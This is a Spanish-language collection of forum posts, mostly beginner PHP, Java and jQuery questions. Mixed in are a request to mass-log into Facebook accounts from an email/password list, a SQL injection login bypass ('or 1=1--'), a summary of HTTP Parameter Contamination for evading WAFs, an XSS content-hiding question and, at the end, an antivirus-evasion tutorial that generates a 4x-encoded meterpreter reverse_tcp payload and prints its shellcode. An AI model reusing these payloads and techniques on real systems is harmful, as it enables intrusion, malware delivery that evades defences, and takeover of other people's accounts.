Temas

Porque cuando hago un decode de una cadena en base 64, me muestra unos caracteres extraños, por ejemplo.

Código (php) [Seleccionar] Expandir

ßïèO1/Ô÷'tÖ@ð2M `à [~0['iYídÐ0$!°2¯BB2¯2¡ 122j`21j2?γ-¥ $j2?2?2?d2=jÐe[]ÀsŸ·1¯0B1«±ãÏÏÀsÃ4Ñ''TÑbíö?¡41 /'-Ñ_XbLP'O'LC ¼, p ÃÀJ  @nullG ×
á ?>

Pero en algunas cosas si las traduce bien, estoy usando:

Código (php) [Seleccionar] Expandir

echo htmlentities( base64_decode($encode), ENT_QUOTES );
y

Código (php) [Seleccionar] Expandir

echo htmlentities( base64_decode($encode), ENT_QUOTES, "UTF-8" );

Algún aporte?

Es primera vez que voy a utilizar este componente, pero antes quiero preguntar si se puede realizar lo siguiente y si alguien tiene información de donde pueda encontrar ejemplos.

A ver lo que quiero realizar es: tener una lista de correos con sus contraseñas, intentar acceder cuenta por cuenta en facebook y crear el mismo estado para todas las cuentas.

Lo que necesito sería:
1. Iniciar sesion.
2. Crear el estado.
3. Cerrar sesión.
4. Repetir el mismo procedimiento.

Supongo que sería lo básico, y que se puede hacer o no?

Mi idea es tener una array con los datos que quiera obtener, y esos buscarlos en la cadena que obtengo de la petición y meterlos en otro vector.

Código (php) [Seleccionar] Expandir


 # Datos obtenidos.
 $oData = '{"id":"1249242","name":"Alex Jurado","gender":"male","picture":"http:\/\/profile.ak.fbcdn.net\/hprofile-ak-snc4\/174534_1249240772_7038143_q.jpg"}';

 #Opciones que quiero extraer.
 $oOpc  = array( 'id','name','gender','picture' );



Por el momento lo solucione así, pero se puede arreglar mucho más.

Código (php) [Seleccionar] Expandir

$oCharacters = '/({|}|:|"|id|name|gender|picture)/';
$oString     = '';

$oString = preg_replace( $oCharacters, '', $pString );
$oString = preg_split('/,/', $oString);
return $oString;

Pues estaba iniciando con la construcción de una aplicación pero necesito un componente o librería para generar consultas MySQL dinamicas, ya sea por medio de jQuery o no se.

Lo que necesito es que haga el filtro y me retorne la query.

Alguien tiene algún documento base o libro para la documentación de un proyecto/software

Necesito tener 2 paneles, uno a la izquierda y el otro en la parte inferior de la siguiente forma,

Código (php) [Seleccionar] Expandir

____________ __________________________
|            |                         |
|            |                         |
|            |                         |
|            |                         |
|            |                         |
|            |                         |
|            |                         |
| PANEL      |      CONTENIDO          |
| IZQUIERDA  |       GENERAL           |
|            |                         |
|            |                         |
|            |                         |
|            |                         |
|            |                         |
|            |_________________________|
|            |                         |
|            |    PANEL INFERIOR       |
|____________|_________________________|

Lo que necesito es que los paneles de izquierda e inferior puedan ser ocultados y que se muestre en totalidad el contenido general. Sólo encuentro o verticales o horizontales, alguien conoce alguno que tenga los 2 integrados.

[Fuente:]

HPC: HTTP Parameter Contamination

Curioso y útil el trabajo presentado por RSnake, j0rgan y lightos sobre la técnica que ellos han llamado HPC, es decir, HTTP Parameter Contamination, que puede ser utilizada fundamentalmente para dos tareas:

1) Hacer Fingerprinting de servidores web.
2) Saltarse filtros en los WAF (Web Application Firewalls).

La idea de la técnica es contaminar el query string de una petición HTTP con caracteres que los servidores web no acepten, y reemplacen, obteniendo un resultado distinto del esperado por el programador, y por lo filtros de seguriad.

Para ello han realizado un análisis basado en el envío de peticiones a servidores GET de caracteres no permitidos en los propios nombres o valores de los parámetros de un quey string para ver qué le estaba llegando realmente a la aplicación. Lo curioso, como se puede ver en las tablas, es que hay muchas más modificaciones de las esperadas, que abre un abanico de posibilidades a la hora de saltar filtros.

Por ejemplo, en un servidor Web con Apache, las peticiones que devolvieron cambios en la Query String fueron las siguientes:

Figura 1: HPC en Apache

En estas pruebas llama poderosamente la atención el reemplazao del caracter [ por un caracter _ lo que abre la posibilidad de llamar a los famosos procedimientos almacenados de MS SQL Server y saltarse los filtros de ModSecurity, como explican en su paper.

Figura 2: Saltarse modsecurity y llamar a un procedimiento almacenado con HPC

En el caso de IIS también sucede algo similar, y estas son las pruebas que produjeron cambios en el comportamiento

Figura 3: HPC en IIS 6

Por supuesto, en este caso, es el caracter nulo el que puede usarse cómodamente para saltarse el URL Filtering de, por ejemplo, los ataques LFI que usan la escalada de directorios con los ..

Figura 4: Evasión de URL Filtering con HPC

Y en el caso de servidores con Tomcat con JSP, sucede más o menos lo mismo, pero con otras poluciones HPC.

Figura 5: HPC en Tomacat con JSP

En definitiva, un paper curioso que puede resultar muy útil, y que hará que haya que modificar muchas aplicaciones y scripts para aprovechar estas características de los servidores web en ataques SQL Injection. Puedes descargalo en PDF desde: HPC: HTTP Parameter Contamination.

Fuente: elladodelmal.com

Alguien sabe como conseguir información del punto en el que se esta ubicado, es decir, supongamos que estamos ubicados en un estadio del pais que sea, como recolectar la información de la información de la calle.

Por ejemplo, en la siguiente ubicación (6.169964,-75.626916), el mapa devuelve
Calle 36 59 1-99
Itagüí, Antioquia, Colombia

[pero el "planeta" que muestra la parte de arboles y de la ciudad]

Estoy trabajando en un proyecto y urgentemente necesito esta imagen, pero el "planeta" que muestra la parte de arboles y de la ciudad la necesito COMPLETA!

Tengo una base de datos con muchos registros, y necesito extraer sólo la fecha pero el campo es del tipo TIMESTAMP WITHOUT TIME ZONE.

Hago lo siguiente, pero no me funciona...

Código (php) [Seleccionar] Expandir

print "<b>Fecha: </b>".date("Y", $data[$i][1]);

El resultado siempre es: "Fecha: 1969"


Os dejo algunos ejemplos de datos que tengo en mi tabla...

Código (SQL) [Seleccionar] Expandir

"2011-05-28 01:42:06"
"2011-05-28 01:43:45"
"2011-05-28 02:04:34"




Olvidadlo, necesitaba de la función strtotime();

Es posible saber la dirección de un trayecto si tengo la Lat-Lon inicial y la final...
Por ejemplo si tengo PI=Punto Inicial; PF= Punto Final.

PI ----> PF
ó
PF <---- PI
o Quizás diagonal.


No se donde poner esto, así que lo pongo en programación general.

[1.]

TRABAJANDO CON PDO
PHP Data Object

CONTENIDO

         1. CONEXIÓN A LA BASE DE DATOS.
         2. EJECUCIÓN DE QUERYS
              2.1 DIRECTA.
              2.2 RETORNO DE DATOS.
              2.3 MANEJO DE DATOS.
                   2.3.1 ARRAY
                        2.3.1.1 NUMÉRICO.
                        2.3.1.2 ASOCIATIVO.
                        2.3.1.3 NUMÉRICO y ASOCIATIVO.
                   2.3.1
                   2.3.1
         3.
         4.
         5.
         6.
         7.
         ∞. BIBLIOTECA DE CÓDIGO.

Fecha ultima actualización: 20 de Junio de 2011

No se puede hacer lo siguiente,

Código (java) [Seleccionar] Expandir


public static int max = 1;
public static int[] vect = new int[max];

public static void main(String[] args){
vect[max-1] = 1; // vect[0] = 1;
max++;
vect[max-1] = 2; // vect[1] = 2;
}


y después cambiarle el tamaño?

Como ubicar está coordenada con GoogleMaps, sabiendo qué, una es la latitud y otra la longitud.

Código (php) [Seleccionar] Expandir

613.260400000000004 N 7536.55199999999968 W

No se que demonios pasa, necesito hacer un upload de imagenes y tengo el siguiente código pero no me funciona...

Código (html4strict) [Seleccionar] Expandir

<form method="POST" action = "CLASS/PoC.php" enctype="multipart/form-data">

  <b>IMAGEN: </b> <input type="file" id = "txtIMG" name = "txtIMG"><br>
  <input type="submit">

</form>

Código (php) [Seleccionar] Expandir

<?php

    print $_FILES['txtIMG']['tmp_name']."<br>";
    print $_FILES['txtIMG']['name']."<br>";

    if(move_uploaded_file($_FILES['txtIMG']['tmp_name'], "/var/www/admin/CATEGORIA/".$_FILES['txtIMG']['name'])){
      print "SI";
    }else{
      print "NO";
    }

?>

Ahora si copia pero sólo con archivos pequeños....

Quiero aprender esto de PDO, pero no lo tengo instalado y mirando en la red(http://www.clubdesarrolladores.com/articulos/mostrar/64-pdo-php-data-objects#t1), explican como hacerlo, pero me sale un error del coño.

Código (bash) [Seleccionar] Expandir

config.status: executing libtool commands
running: make
/bin/bash /tmp/pear/temp/pear-build-root36vzn0/PDO-1.0.3/libtool --mode=compile cc  -I. -I/tmp/pear/temp/PDO -DPHP_ATOM_INC -I/tmp/pear/temp/pear-build-root36vzn0/PDO-1.0.3/include -I/tmp/pear/temp/pear-build-root36vzn0/PDO-1.0.3/main -I/tmp/pear/temp/PDO -I/usr/include/php5 -I/usr/include/php5/main -I/usr/include/php5/TSRM -I/usr/include/php5/Zend -I/usr/include/php5/ext -I/usr/include/php5/ext/date/lib -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64  -DHAVE_CONFIG_H  -g -O2   -c /tmp/pear/temp/PDO/pdo.c -o pdo.lo
libtool: compile:  cc -I. -I/tmp/pear/temp/PDO -DPHP_ATOM_INC -I/tmp/pear/temp/pear-build-root36vzn0/PDO-1.0.3/include -I/tmp/pear/temp/pear-build-root36vzn0/PDO-1.0.3/main -I/tmp/pear/temp/PDO -I/usr/include/php5 -I/usr/include/php5/main -I/usr/include/php5/TSRM -I/usr/include/php5/Zend -I/usr/include/php5/ext -I/usr/include/php5/ext/date/lib -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -DHAVE_CONFIG_H -g -O2 -c /tmp/pear/temp/PDO/pdo.c  -fPIC -DPIC -o .libs/pdo.o
/bin/bash /tmp/pear/temp/pear-build-root36vzn0/PDO-1.0.3/libtool --mode=compile cc  -I. -I/tmp/pear/temp/PDO -DPHP_ATOM_INC -I/tmp/pear/temp/pear-build-root36vzn0/PDO-1.0.3/include -I/tmp/pear/temp/pear-build-root36vzn0/PDO-1.0.3/main -I/tmp/pear/temp/PDO -I/usr/include/php5 -I/usr/include/php5/main -I/usr/include/php5/TSRM -I/usr/include/php5/Zend -I/usr/include/php5/ext -I/usr/include/php5/ext/date/lib -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64  -DHAVE_CONFIG_H  -g -O2   -c /tmp/pear/temp/PDO/pdo_dbh.c -o pdo_dbh.lo
libtool: compile:  cc -I. -I/tmp/pear/temp/PDO -DPHP_ATOM_INC -I/tmp/pear/temp/pear-build-root36vzn0/PDO-1.0.3/include -I/tmp/pear/temp/pear-build-root36vzn0/PDO-1.0.3/main -I/tmp/pear/temp/PDO -I/usr/include/php5 -I/usr/include/php5/main -I/usr/include/php5/TSRM -I/usr/include/php5/Zend -I/usr/include/php5/ext -I/usr/include/php5/ext/date/lib -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -DHAVE_CONFIG_H -g -O2 -c /tmp/pear/temp/PDO/pdo_dbh.c  -fPIC -DPIC -o .libs/pdo_dbh.o
/tmp/pear/temp/PDO/pdo_dbh.c: In function 'pdo_stmt_instantiate':
/tmp/pear/temp/PDO/pdo_dbh.c:410:8: error: 'zval' has no member named 'refcount'
/tmp/pear/temp/PDO/pdo_dbh.c:411:8: error: 'zval' has no member named 'is_ref'
/tmp/pear/temp/PDO/pdo_dbh.c: In function 'pdo_stmt_construct':
/tmp/pear/temp/PDO/pdo_dbh.c:435:6: error: 'zend_fcall_info' has no member named 'object_pp'
/tmp/pear/temp/PDO/pdo_dbh.c:458:6: error: 'zend_fcall_info_cache' has no member named 'object_pp'
/tmp/pear/temp/PDO/pdo_dbh.c: In function 'zim_PDO_setAttribute':
/tmp/pear/temp/PDO/pdo_dbh.c:752:12: error: 'zval' has no member named 'refcount'
/tmp/pear/temp/PDO/pdo_dbh.c: In function 'zim_PDO_getAttribute':
/tmp/pear/temp/PDO/pdo_dbh.c:818:28: error: 'zval' has no member named 'refcount'
/tmp/pear/temp/PDO/pdo_dbh.c: In function 'pdo_hash_methods':
/tmp/pear/temp/PDO/pdo_dbh.c:1122:24: warning: assignment discards qualifiers from pointer target type
/tmp/pear/temp/PDO/pdo_dbh.c:1126:20: warning: assignment discards qualifiers from pointer target type
make: *** [pdo_dbh.lo] Error 1
ERROR: `make' failed

Supongamos que tenemos el siguiente código

Código (php) [Seleccionar] Expandir

$resultado = mysql_query("SELECT * FROM usuarios WHERE login='$_POST[user]'");
Este sería fácil, porque no tiene filtro para limpiar la variable. Así que sería algo como esto,

Código (sql) [Seleccionar] Expandir

SELECT * FROM usuarios WHERE login='' or 1=1--'

Pero sí primero se realiza el SELECT y se guarda el pass en un array y después es comparado con la variable enviada, así,

Código (php) [Seleccionar] Expandir

$password = md5($_POST['pass']);
if($array["pass"] == $password ){

Como se podría bypassear?

[Gmail]

Gmail, tiene la posibilidad de crear un grupo para alguna empresa u organización para crear cuentas de correo personalizadas, es decir, shellroot@elhacker.net, al crear este grupo se pueden crear filtros de spam, es decir, configurar con alguna expReg, para marcar como spam correos de ventas u otros que no tengan que ver con la empresa?. Pero sin hacerlo en cada cuenta, lo digo en general?

[-No lo terminamos porque no sabíamos como realmente era-]

En clase de programación, nos explicaron algunos métodos para ordenar elementos y uno de estos fue el siguiente: -No lo terminamos porque no sabíamos como realmente era-

Suponiendo que tengo el siguiente vector: 1,3,5,10,20 y quiero ingresar el número 22.
Además de que las variables:
 TV = TotalValores, que en este casi son 5.
 A = vector
 VALIN = Valor a ingresar
No logro entender como hacerlo,...

Código (php) [Seleccionar] Expandir

PROCEDIMIENTO insertar_ordenado( TV, A, VALIN )
 l = 1
 MIENTRAS ( l <= TV ) && ( VALIN > A[l] )
   l = l + 1
 FIN MIENTRAS

 TV = TV + 1

 PARA K = TV; l + 1; -1 HACER
   A[k] = A[k-1]
 FIN PARA

 A[l] = VALIN

FIN

Bueno, ando en una aplicación que me ha comido la cabeza, hasta ahora tengo la parte del ingreso a la aplicación, pero ahora quiero hacerle el mantenimiento de datos a las tablas, pero no logro hacerlo.

Quiero hacer lo siguiente, dentro del mismo formulario, listar los usuarios, pero tiene una gran cantidad de campos, así que no se como mostrarlos, supongamos que eso no importará, pero como hago para editar los registros.

Cuando programaba en Aspx.Net, existía un GridView al cual se le podría hacer modificaciones, así que cuando se decidía modificar, se agregaban TextBox para modificaros. Quisiera hacer algo como eso, pero no se me ocurre nada.

Alguna opinión, sugerencia, link...

Tengo una MicroSD que normalmente lei mi ubuntu, pero ahora que se actualizo a la ultima versión no me deja verla. He mirado bastante en la red de como montar la MicroSD pero no logro hacerlo.

Alguna ayuda?

Se lo que son y como funcionan, pero necesito una PopUp que no interactue con la ventana padre, hasta que la ventana hija no se cierre.

Pues ando consultado un poco lo de pilas y colas en Java y casi no entiendo, pero podrían darme un ejemplo.

Hasta lo que he leido, tiene 4 funciones: isEmpty(), add(), remove(), clear().
Ese código ya está preestablecido o lo puedo crear yo?
Solo son esas 4 funciones?
Obviamente se usan vectores o no?

Bueno, hace varios días que ando programando, y ahora me dio la curiosidad de saber sobre los tokens.
No entiendo muy bien como funcionan, es decir, como se crean -no en código sino en acciones-

[EDIT:]

Tengo como una especia de carrito de compra y quiero que al darle click en el boton Agregar producto, se agregue el producto en una tabla de la una base de datos.

Pero como puedo hacer que al darle click se ejecute una función de PHP?

EDIT: Es con peticiones GET?

[1.]

Quiero implementar y de una vez aprovecho para preguntar, a ver si esta bien hacer lo siguiente.

Estoy todavía con las validaciones en JQuery, ya me funcionan, pero quiero hacerlo de 3 tipos.
1. Alfabéticos.               /^([a-zA-Z\s])+$/
2. Numéricos.               /^([0-9\s])+$/
3. Alfanuméricos.         /^([a-zA-Z-0-9\s])+$/

Pero como puedo hacer para que en la expresión número 3, también pueda ingresar la ñ, á, é, í, ó, ú.
Las ExpReg están bien? o podría implementar otras? Alguna idea?

[Es obvio que no se elimina por completo, sólo se oculta.]

Se que se puede pero no se como, ocultar el contenido original y mostrar sólo mi código. Es decir,

Supongamos que tengamos una pagina HTML como la siguiente:

Código (html4strict) [Seleccionar] Expandir

<html>
<head></head>
<body>
  <h1>Hola mundo H1</h1>
  <h2>Hola mundo H2</h2>
  <h3>Hola mundo H3</h3>
  <h4>Hola mundo H4</h4>
  <h5>Hola mundo H5</h5>
</body>
</html>

y que dicha pagina tenga un XSS... y quiero mostrar sólo mi código, que no aparezca los h1, h2, h3, h4 y h5.
Es obvio que no se elimina por completo, sólo se oculta.

Bien, aprendiendo un poco JQuery, estoy haciendo una validación para los campos de un formulario. Básicamente para Cadenas y Números.

Por ahora tengo esto, lo que me falta es como ejecutar la expresión regular, es decir, que analice la sString ingresada como parámetro con la sExpReg.

Código (javascript) [Seleccionar] Expandir

function validarCampo( sString, sLength, sTipo ){
  var sEstado = true;
  var sExpReg = "";
  var sObj    = $("#" + sString); 

  if( sTipo == "str" ){ sExpReg = "([a-zA-Z]*)"; }
  else if( sTipo == "num" ){ sExpReg = "([0-9]*)"; }

  if( sObj.val() == "" ){
    failField( sString, "Campo requerido." );
    sEstado = false;
  }

  if( (sObj.val().length >= 1) && (sObj.val().length <= sLength) ){
    failField( sString, "El tamaño debe ser mayor a " + sLength + "." );
    sEstado = false;
  }

  return sEstado;
}

Tengo lo siguiente,

Código (sql) [Seleccionar] Expandir

mysql> SELECT categoria, imgurl FROM categoria;
+-------------------+----------------+
| categoria         | imgurl         |
+-------------------+----------------+
| Lujos             | lujos.jpg      |
| Latas             | latas.jpg      |
| Aseo              | aseo.jpg       |
| Partes Electricas | electricas.jpg |
+-------------------+----------------+
4 rows in set (0.00 sec)

Ahora dentro de PHP quiero que aparezca lo mismo en la siguiente estructura:

Código (sql) [Seleccionar] Expandir

+-------------------+-------------------+
| Lujos             | Latas             |
+-------------------+-------------------+
| lujos.jpg         | latas.jpg         |
|                   |                   |
|                   |                   |
+-------------------+-------------------+
| Aseo              | Partes Electricas |
+-------------------+-------------------+
| aseo.jpg          | partes.jpg        |
|                   |                   |
|                   |                   |
+-------------------+-------------------+

Las columnas depende de un parámetro ingresado en la función.

Código (php) [Seleccionar] Expandir

  function sCategorias( $sColumnas )
  {
    $sHTML   = "";
    $sSQL    = "";
    $sQuery  = "";

    # QUERY
    $sSQL   = "SELECT categoria, imgurl FROM categoria;";
    $sQuery = sExecQuery( $sSQL );

    # HTML
    $sHTML .= "<table border='1'>";
    $sHTML .= "<tr>";
    while( $sRows = mysql_fetch_array( $sQuery, MYSQL_NUM )){
      $sHTML .= "<td>".$sRows[0]."</td>";
    }
    $sHTML .= "</tr>";
    $sHTML .= "</table>";
    return $sHTML;
  }

No se como hacerlo, alguna idea?

Existe algún software / aplicación que permita realizar anotaciones mediante se construye una aplicación. Es decir, algo tipo agenda en donde yo pueda definir el día y los procedimientos realizados. Después sacar todos los días que contengan acciones para especie de informe.

Especialmente que sea para Linux. Sino pues tengo el wine.

Hay algún tipo de problema al usar una función como la siguiente. Me refiero a las ExpReg.

Código (php) [Seleccionar] Expandir


  $sExpReg = '';

  if( $sType == "CHAR" ){ $sExpReg = "/^[a-z]+$/i"; }         # CHAR = String
  elseif( $sType == "NUM" ){ $sExpReg = "/^[[:digit:]]+$/"; } # NUM  = Numbers
  elseif( $sType == "ALL" ){ $sExpReg = "/^[[:alnum:]]+$/"; } # ALL  = String and Numbers
  else{ return 0; }

  if( @preg_match( $sExpReg, $sString ) ){ return $sString; }
}

Tengo 2 archivos, index.php y registrarse.php. Cuando paso de index a registrarse, el formulario de registrarse aun no ha interactuado. Como hago para saberlo, es como una validad que quiero hacer.

[PD:]

Bueno, es la primera vez que deseo enviar un correo electrónico desde PHP. Consultando un poquin, me encontre la función MAIL(), pero no me funciona, así que buscando en esta sección ocurrió algo parecido pero en Win$. En el POST que leí decían lo siguiente,

Código (php) [Seleccionar] Expandir

ini_set("SMTP","mail.cantv.net");
ini_set("smtp_port",25);
ini_set("sendmail_from","turemitente@gmail.com");
$correo = "*****@hotmail.com";
$correo2 = "****@gmail.com";
$asunto = "Envio e-mails";
$cuerpo = "Por fin FUNCIONO!!!!";
mail($correo,$asunto,$cuerpo,"FROM: $correo2");

Así que cambiandole los valores por el servidor de correo que usaré (Hotmail), quedaría así:

Código (php) [Seleccionar] Expandir

  ini_set("SMTP", "smtp.live.com");
  ini_set("smtp_port", 25);
  ini_set("sendmail_from", "alex19910218@hotmail.com");

  $correo = "alex19910218@hotmail.com";
  $correo2 = "alex19910218@hotmail.com";
  $asunto = "Envio e-mails";
  $cuerpo = "Por fin FUNCIONO!!!!";

  mail($correo, $asunto, $cuerpo, "FROM: $correo2");

Pero tampoco me funciona, y no me muestra error. Si mal no recuerdo, también leí que había que modificar algo del PHP.INI. Pero no se.

PD: Cabe decir que estoy en linux.

Estoy desarrollando una aplicación de un taller de motos (Motorcycle Workshop), y quería que el diseño principal sea algo como de la calle, underground, graffitis. Pero no se como buscar esas imágenes, la única que me gusto es la siguiente,



Algunas imágenes que podrían recomendarme?

[1.]

Pues hoy en la clase de lógica y programación, nos pusieron un ejercicio de como saber si un número es par. Pero tenemos varias limitaciones.
1. Estamos viendo el condicional IF
2. No podemos usar la función MOD

Sí puedo hacerla fácilmente, pero usando un bucle cosa que tampoco puedo porque no hemos llegado a esa sentencia. No puedo adelantarme...

Hay algún método de calcularlo. Sabiendo qué:
(4 / 2) = (2 / 2) = 0 --> PAR

Pero si es un número por ejemplo 84, tengo que hacer muchas operaciones. Alguna idea?

Edit: Otra cosa sería dividir en número entre 2 y validar si es un número entero. Pero como sería eso en un algoritmo pseudocódigo. :S

Coño, he leído unos tutoría de como crear un sistema de usuarios y tengo el siguiente problema.

Creo la COOKIE con un valor. Así,

Código (php) [Seleccionar] Expandir

setcookie("sSUser", $sRows['nombre'].' '.$sRows['apellido'], time()+3600,"/","127.0.0.1");

Y la destruyo así,

Código (php) [Seleccionar] Expandir

echo "<a href='index.php' OnClick='".setcookie("sSUser")."'>Cerra Sesión</a>";

También he intentado con javascript...

Código (javascript) [Seleccionar] Expandir

# function borrarcookie(){ 
#       var d = new Date(); 
#       document.cookie = "cookie1=1;expires=" + d.toGMTString() + ";" + ";"; 
#       alert(document.cookie); 
#  }

Por alguna u otra cosa, la COOKIE sigue allí.

Bueh, por ahora ando en un proyecto y tengo una pregunta -nunca he trabajo con un sistema así-, y como adicción a una aplicación, tengo que informarme al personal de trabajo de la aplicación mediante un mensaje de texto.

A la hora de enviar un mensaje de texto, supongo que se debería de pagar por ese servicio? O quizás con el plan de empresa -para celulares-, se pueda emplear de alguna u otra forma?

Alguien podría orientarme?

[httpdocs]

Como podría hacer que por ejemplo, toda la carpeta de httpdocs se descargará en mi laptop. Ya sea archivo por archivo -automaticamente- o crear un ZIP o RAR con los archivos y después descargarlo.

Si tiene un script por ahí podrían pasármelo, mientras tanto voy a construirlo. Alguna ayuda?

[Snuff - Slipknot]

En busca de las mejores frases en canciones de cualquier genero.

* Entierra todos tus secretos en mi piel... Marchate con tu inocencia y dejame con mis pecados...
* Así que si me quieres dejame marchar y vete lejos antes de que me de cuenta. Mi corazón es demasiado oscuro como para que me importe. No puedo destruir lo que esta ahí...
* Si estoy solo no puedo odiar...
* Si acaso puedo cambiar espero nunca saberlo...
* No pudiste odiar lo suficiente para amar...
* Solo desearía que no fueses mi amiga... así podría hacerte daño al final...
* Me vendiste para poder salvarte a ti misma...
* ...los ángeles mienten para mantener el control...

Snuff - Slipknot

[RegExp:]

Si tengo la siguiente expresion regular -no importa si sea buena o mala, sólo es una curiosidad-.
RegExp: [a-zA-Z]*, la construí de tal modo de que sólo acepten una cadena en minúscula y/o mayúscula. -eso supongo XD-

Ahora la combino con PHP de la siguiente forma,

Código (php) [Seleccionar] Expandir

  function setVPoC($sPoC){
    $sExpReg = "/[a-zA-Z]*/";
    if(preg_match($sExpReg, $sPoC)){ return 1; } else { return 0; }
  }

pero cuando hago lo siguiente,

Código (php) [Seleccionar] Expandir

  echo setVUsername("shel1root")."\n";
el resultado es,

Código (perl) [Seleccionar] Expandir

alex@alex:~/Escritorio$ php PoC.php
1

WTF!

Amigos, tengo un serio problema con una memoria microSD, la compré y cuando la adapto a mi laptop o cualquier otra, me sale lo siguiente:



Como podría usarla, porque coño la necesito para mi celular... :/

Alguna idea.

[Nuestra shell:]

Bypassing AVs inyectando con shells alfanuméricas

Bueno gente en hoy les voy a mostrar como bypassear el antivirus inyectando meterpreter directamente en otro proceso, logrando que este corra en el su mismo contexto, por medio de Injector una mini tool hecha por Amit Malik.

El escenario es el siguiente, tenemos shell sea php o clásica(esta voy a usar yo) en nuestra víctima, queremos subir meterpreter para poder aprovechar todo lo que nos brinda para la postexplotación pero cuando lo subimos el antivirus lo detecta y lo borra, con la pequeña introducción vamos a lo bueno.

Nuestra shell:

Código (dos) [Seleccionar] Expandir

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

ok lo que primero que vamos a hacer es crear el meterpreter que vamos a subir para inyectar, estos comando los tienen que ejecutar dentro del directorio de metasploit:

Código (bash) [Seleccionar] Expandir

@Free-Box:/opt/MSF/trunk$ [b]sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 R|./msfencode -c 4 -e x86/shikata_ga_nai -o /tmp/meter.exe -t exe[/b]
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)

Ok que hice con este comando, generé un meterpreter y como tipo de salida de la instrucción msfpayload le dije RAW, a esa salida estandar la redirijí con un pipe al msfencode y lo encripté 4 veces con shikata_ga_nai y el formato de salida en perl.

Vamos a /tmp y nos fijamos si está:

Código (bash) [Seleccionar] Expandir

@Free-Box:/opt/MSF/trunk$[b] cd /tmp[/b]
@Free-Box:/tmp$ [b]ls|grep meter[/b]
meter
@Free-Box:/tmp$ [b]cat meter[/b]
buf =
"\x29\xc9\xbd\x63\x4e\x7c\x5e\xb1\x5e\xd9\xf7\xd9\x74\x24" +
"\xf4\x58\x31\x68\x0e\x03\x68\x0e\x83\xa3\x4a\x9e\xab\x9b" +
"\x39\xce\x70\xf5\x67\x37\x53\xc0\x41\xbc\x80\x26\x2a\x8c" +
"\x9e\xf7\x8e\xfd\xa3\x1c\xec\x01\xe7\x87\x7f\xd7\x71\x5f" +
"\x4b\x13\x6d\x5c\xae\x56\x99\x08\xbe\x6f\xfa\xf1\x81\x63" +
"\xaf\x71\x2a\x56\x8f\xff\x05\xdd\x64\x02\x3d\x0b\x12\x38" +
"\xae\x18\xef\x06\x6d\xff\x98\x1c\x82\x04\x68\x96\x9d\xb5" +
"\x80\x25\xd6\x17\x91\xd4\xdf\xe9\x82\x4f\xf1\xa0\x7a\x64" +
"\x44\x26\x18\x80\xe8\x00\x41\xaa\xc3\xf5\x0e\xbc\x7f\x0f" +
"\x30\xd6\x93\x91\x29\xd4\x13\xc8\x93\x5c\x0c\x2d\x28\x08" +
"\xca\x28\x1e\x1a\x39\x8f\xe4\xd9\xd1\xa6\x52\xeb\x00\x63" +
"\x67\x3f\x59\x57\x97\xd3\xb1\x13\x14\x53\x08\xcb\x24\x5a" +
"\xc8\xc0\xe4\xb8\x1b\x6f\x5b\xdd\xe1\x7b\xa8\x09\xdb\x06" +
"\x31\x24\xd0\xbf\x2f\x25\xf2\x4c\x49\xb4\x8b\x0a\x00\xc4" +
"\xcd\x74\x38\xbd\x14\x8c\xb4\xed\xcf\x2f\xb8\x01\x16\x31" +
"\xf1\xd0\x90\xd8\xfd\x33\x6a\xbf\xea\xaa\x46\xdd\x12\xa5" +
"\x13\x3b\x49\x53\x48\x2a\x28\x6b\x0b\x3b\x57\x7e\x84\x13" +
"\xf8\x7e\xd6\xcb\x83\x71\x4f\x55\xe8\x22\xb6\x07\x22\x9f" +
"\x8d\xc3\x5e\xd8\x6b\x89\x0e\x12\xe4\xc4\x6e\x8c\x32\x76" +
"\x24\x64\xd3\x5c\xbf\xd0\xbc\xab\x3c\x9b\xa2\xb9\xf9\xd8" +
"\x6d\x5e\x72\x94\x10\xa9\x58\xfe\xc0\x45\xb9\x53\x99\xa2" +
"\xff\x8c\x24\xf8\xc4\xab\x53\x96\x5b\xad\xf2\x29\xdd\x1e" +
"\x8f\x73\xad\x66\x84\x84\xb1\xd3\xc9\xe0\xba\x40\x6f\xa5" +
"\x17\xda\x1f\xa4\x35\x95\x46\x96\xf6\x9c\xfe\x92\xc0\xcc" +
"\xab\x42\x56\x8a\x1c\x79\x4e\xc3\x41\xf8\x83\xc8\x3a\x33" +
"\x42\x7d\xa9\xa8\xa2\xfd\x28\x8d\xd6\x9f\x41\x90\x33\x0c" +
"\xf6\xc2\x18\x23\x6f\x40\x48\xd6\x30\x30\x47\xc4\x8f\xb5" +
"\x22\xe0\x36\x98\xb0\xe5\xbc\x12\x2e\x3f\xf6\x5f\xc2\x49" +
"\x62\x2d\x52\xef\xaa\x84\x88"

Y ahí esta nuestro meterpreter, y ustedes dirán para que lo quiero así, no se apuren ahora viene esa parte.

Ok porqué lo necesito así porque para poder subirlo y que no lo detecte para nada vamos a convertir el shellcode a alfanumérico, que pasa si lo subimos directamente:


ok, para convertir nuestra shell usamos un script en python que nos provee el autor(al final el link de desacarga de todo) al cual le agregamos nuestra shell.

Código (python) [Seleccionar] Expandir

#!/usr/bin/python
#generic payload builder for injector
#Plz first test the payloads on your system.. otherwise you know you can't blame anyone :) 

